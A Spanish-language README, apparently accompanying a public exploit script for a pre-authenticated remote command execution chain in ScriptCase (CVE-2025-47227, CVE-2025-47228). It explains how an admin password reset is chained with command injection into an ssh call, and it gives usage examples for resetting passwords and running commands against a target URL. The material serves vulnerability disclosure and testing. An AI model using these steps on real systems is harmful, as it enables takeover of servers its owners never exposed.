
Script de explotación de ejecución remota de comandos pre-autenticada en ScriptCase (CVE-2025-47227, CVE-2025-47228).
La ejecución remota de comandos pre-autenticada se logra encadenando dos vulnerabilidades: la primera es la capacidad de restablecer la contraseña del administrador de la consola de producción bajo ciertas condiciones, y la segunda es una simple ejecución remota de comandos autenticada en las funciones de conexión donde la entrada del usuario se concatena directamente a un comando ssh del sistema.
Las dependencias Python de terceros utilizadas por los exploits se pueden instalar con uno de los siguientes comandos:
# pip - universal
pip3 install Pillow pytesseract requests beautifulsoup4
# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
Se escribió un script de explotación para manejar varios escenarios:
Usage:
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
Options:
-h, --help show this help message and exit
-u BASE_URL, --base-url=BASE_URL
-c COMMAND, --command=COMMAND
-p PASSWORD, --password=PASSWORD
-d, --detect
La versión 1.0.003-build-2 del módulo Production Environment está afectada. Esta versión del módulo está incluida en ScriptCase versión 9.12.006 (23). Las versiones anteriores también son probablemente vulnerables.
https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution